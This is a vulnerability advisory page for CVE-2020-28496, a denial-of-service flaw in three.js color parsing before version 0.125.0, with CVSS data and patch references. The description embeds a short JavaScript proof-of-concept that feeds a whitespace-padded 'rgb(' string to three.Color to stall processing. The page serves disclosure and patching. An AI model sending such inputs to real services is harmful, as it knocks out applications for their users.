CVE-2020-28496
Last modified
CVE-2020-28496 is a high-severity vulnerability rated 7.5/10 on the CVSS scale. This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. EPSS estimates a 2.52% chance of exploitation in the next 30 days.
Description
This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")
Metrics
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Weakness Enumeration
Affected Software
| Vendor | Product | Versions |
|---|---|---|
| Three Project | Three | < 0.125.0 |
References
- https://github.com/mrdoob/three.js/issues/21132Exploit, Issue Tracking, Third Party Advisory
- https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583ePatch, Third Party Advisory
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1065972Exploit, Third Party Advisory
- https://snyk.io/vuln/SNYK-JS-THREE-1064931Exploit, Third Party Advisory
- https://github.com/mrdoob/three.js/issues/21132Exploit, Issue Tracking, Third Party Advisory
- https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583ePatch, Third Party Advisory
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1065972Exploit, Third Party Advisory
- https://snyk.io/vuln/SNYK-JS-THREE-1064931Exploit, Third Party Advisory
Timeline
- Published
- Last Modified
- Status
- Modified
Frequently Asked Questions
What is CVE-2020-28496?
How severe is CVE-2020-28496?
How do I fix CVE-2020-28496?
Are you affected by CVE-2020-28496?
Run a free Strix scan to check your systems for this vulnerability.
Scan your code nowSource: NVD / NIST
